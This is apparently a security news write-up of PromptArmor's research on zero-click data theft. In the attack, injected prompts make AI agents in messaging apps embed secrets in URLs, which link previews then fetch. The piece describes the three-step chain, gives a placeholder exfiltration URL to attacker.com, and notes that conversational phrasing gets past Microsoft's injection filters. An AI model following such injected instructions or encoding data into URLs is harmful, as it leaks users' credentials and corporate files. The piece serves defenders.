AI agents leak secrets through messaging app link previews
PromptArmor demonstrated that AI agents in messaging platforms can exfiltrate sensitive data without any user interaction. Malicious prompts trick AI agents into generating URLs with embedded secrets (API keys, credentials), and the messaging platform's automatic link preview feature fetches these URLs, completing the exfiltration before the user even sees the message. Microsoft Teams with Copilot Studio was the most affected, with Discord, Slack, Telegram, and Snapchat also vulnerable.
Incident Details
Tech Stack
References
The Feature That Became a Channel
Link previews are one of those convenience features that nobody thinks about. When you paste a URL into a messaging app, the app automatically fetches the page and displays a preview - a title, a description, maybe a thumbnail image. It happens instantly, before anyone clicks the link, because the whole point is to give recipients context about what they'd be clicking on.
AI security firm PromptArmor discovered that this unremarkable piece of messaging infrastructure can be weaponized when combined with AI agents. The attack is elegant in its simplicity: trick an AI agent into generating a URL that contains sensitive data as part of the URL itself (such as API keys, credentials, or confidential text embedded in query parameters), and let the messaging platform's link preview feature do the rest. When the platform fetches the URL to generate the preview, it sends a request to the attacker's server - complete with whatever secrets are encoded in the URL. No click required. No user interaction of any kind.
How the Attack Works
The attack chain has three steps, none of which require the victim to do anything suspicious.
First, a malicious prompt is delivered to an AI agent. This could arrive through any channel the agent monitors - a message in a chat, an email, a document it processes. The prompt instructs the agent to gather specific sensitive information from its environment (API keys, credentials, internal data) and construct a URL containing that information as parameters.
Second, the AI agent follows the instructions. It retrieves the requested data and generates a message containing a URL - something like https://attacker.com/collect?data=[stolen_credentials]. The agent outputs this as part of its response, which appears in the messaging platform.
Third, the messaging platform's link preview feature kicks in automatically. Before the user even reads the message, the platform's servers (or the user's client) fetch the URL to generate a preview. That fetch request hits the attacker's server, which logs the URL parameters - and with them, whatever secrets the AI agent embedded.
The entire chain completes without the user clicking anything, approving anything, or even reading the message. It's a zero-click exfiltration channel that exploits the AI agent's access to data and the messaging platform's eagerness to be helpful.
The Affected Platforms
PromptArmor tested the technique across multiple messaging platforms and found widespread vulnerability. Microsoft Teams with Copilot Studio was the most severely affected, which makes sense given that Copilot Studio agents often have access to corporate data through Microsoft 365 integration. The potential exfiltration surface for a Teams-based attack includes intellectual property files, business contracts, legal documents, internal communications, and financial data.
Discord, Slack, Telegram, and Snapchat were also vulnerable to varying degrees. OpenClaw was specifically called out as vulnerable when using default configurations in Telegram, though PromptArmor noted that this could be mitigated by changing a setting in OpenClaw's configuration file.
PromptArmor published a website where users can test their own AI agents integrated into messaging apps to see whether they trigger insecure link previews. The tool is designed to help organizations audit their exposure without needing to execute the attack for real.
The Microsoft Copilot Angle
The Microsoft Teams vulnerability was particularly significant because Copilot is deeply integrated into Microsoft 365. A related attack demonstrated by researchers showed that a seemingly innocuous email sent to a target could contain a hidden prompt instructing Copilot to exfiltrate sensitive corporate data to an attacker-controlled server.
The researchers noted that the prompt needs to be phrased conversationally - like speaking to a human - to bypass Microsoft's cross-prompt injection attack (XPIA) defenses. This is a recurring theme in AI security: the defenses are designed to catch obviously malicious instructions, but they can be circumvented by rephrasing the same instructions in natural language that the AI interprets identically but the defense filters don't flag.
Microsoft addressed the specific vulnerability after responsible disclosure. But the underlying architectural issue - that AI agents with data access can be instructed to embed secrets in URLs, and that messaging platforms will automatically fetch those URLs - persists across the ecosystem.
Two Features, One Vulnerability
The vulnerability exists at the intersection of two independently useful features, neither of which is dangerous on its own.
AI agents with data access are useful because the whole point of an AI assistant is to retrieve and synthesize information. An AI agent that can't access files, emails, or credentials wouldn't be very helpful.
Link previews are useful because they give messaging participants context about shared URLs without requiring them to click potentially unsafe links. The irony is that link previews were partly conceived as a safety feature - they let you see what's behind a URL before you commit to visiting it.
The problem is that nobody designed these features to work together safely. The AI agent doesn't know (or care) that its output will be processed by a link preview engine. The link preview engine doesn't know (or care) that the URL it's fetching was generated by an AI agent that was tricked into encoding secrets in it. Each component works as designed. The vulnerability is emergent - it exists only in the composition of the two features, in the gap between what each component assumes about the other.
The Broader Pattern
This is another entry in the growing catalogue of attacks that exploit the trust boundaries between AI agents and the platforms they operate within. The AI agent trusts its input (even when that input is a malicious prompt). The messaging platform trusts the AI agent's output (automatically fetching any URL it generates). The attacker doesn't need to compromise either system - they just need to send a message that the AI agent will process as an instruction.
For organizations deploying AI agents in messaging platforms, the immediate defensive question is whether to disable link previews for AI-generated messages, restrict what data AI agents can access, or implement output filtering that detects and blocks URLs containing sensitive material. None of these options are simple, and each involves tradeoffs between security and the convenience that drove the adoption of AI agents in the first place.
PromptArmor's research makes the tradeoff concrete: the feature that shows you what's behind a link before you click it can now also show the attacker what's in your inbox before you know they're looking.
Discussion